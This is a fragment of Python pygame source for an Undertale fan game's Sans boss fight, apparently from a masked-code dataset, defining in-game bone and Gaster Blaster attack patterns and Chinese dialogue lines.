speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n 
global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, 
time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: 
set_screen_angle(0), 682))\n\n\n<mask token>\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 20, BOX_POS[1]], time1=\n 1000, length=130, angle=-45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[\n 1]], time1=1000, length=130, angle=45, speed=[-5, 0, 0, 0]))\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], 
time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n\n def zjj(screen):\n angle = random.randint(-140, -40)\n d = random.randint(10, 200)\n blasters.append(GasterBlaster(pos=[player.pos[0] + math.cos(math.\n radians(angle)) * d, player.pos[1] + math.sin(math.radians(\n angle)) * d], angle=angle - 180, time1=0, time2=20, width=50))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, 
width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], 
speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef zjj_1():\n set_turn_time(60)\n global BOX_POS, BOX_SIZE\n BOX_POS = [200, 230]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n 
bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n@add_attack\ndef orange_bone():\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 0))\n tasks.append(Task(stop_spinning, 180))\n tasks.append(Task(lambda screen: set_screen_angle(180), 181))\n tasks.append(Task(start_spinning, 520))\n tasks.append(Task(stop_spinning, 700))\n tasks.append(Task(lambda screen: set_screen_angle(0), 701))\n set_turn_time(700)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=10,\n direction=DOWN, time1=1000, time2=_ * 60 + 60, speed=[8, 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 30 + 16], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 60 + 60, speed=[8, \n 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 8, speed=[8, 0], type_=1, color=ORANGE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n 
player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n 
global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: set_screen_angle(0), 682))\n\n\n@add_attack\ndef board_3():\n set_turn_time(100)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n 
player.falling_speed = 10\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n tasks.append(Task(shake, 60))\n tasks.append(Task(unshake, 65))\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 10], angle=90, time1=10,\n time2=50, time3=0, width=50))\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid1():\n set_turn_time(70)\n global BOX_SIZE, BOX_POS\n BOX_POS = [200, 240]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[\n 1]], time1=1000, length=130, angle=45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[\n 1] + BOX_SIZE[1]], time1=1000, length=130, angle=-45, speed=[-5, 0,\n 0, 0]))\n\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n 
player.falling = True\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 20, BOX_POS[1]], time1=\n 1000, length=130, angle=-45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[\n 1]], time1=1000, length=130, angle=45, speed=[-5, 0, 0, 0]))\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 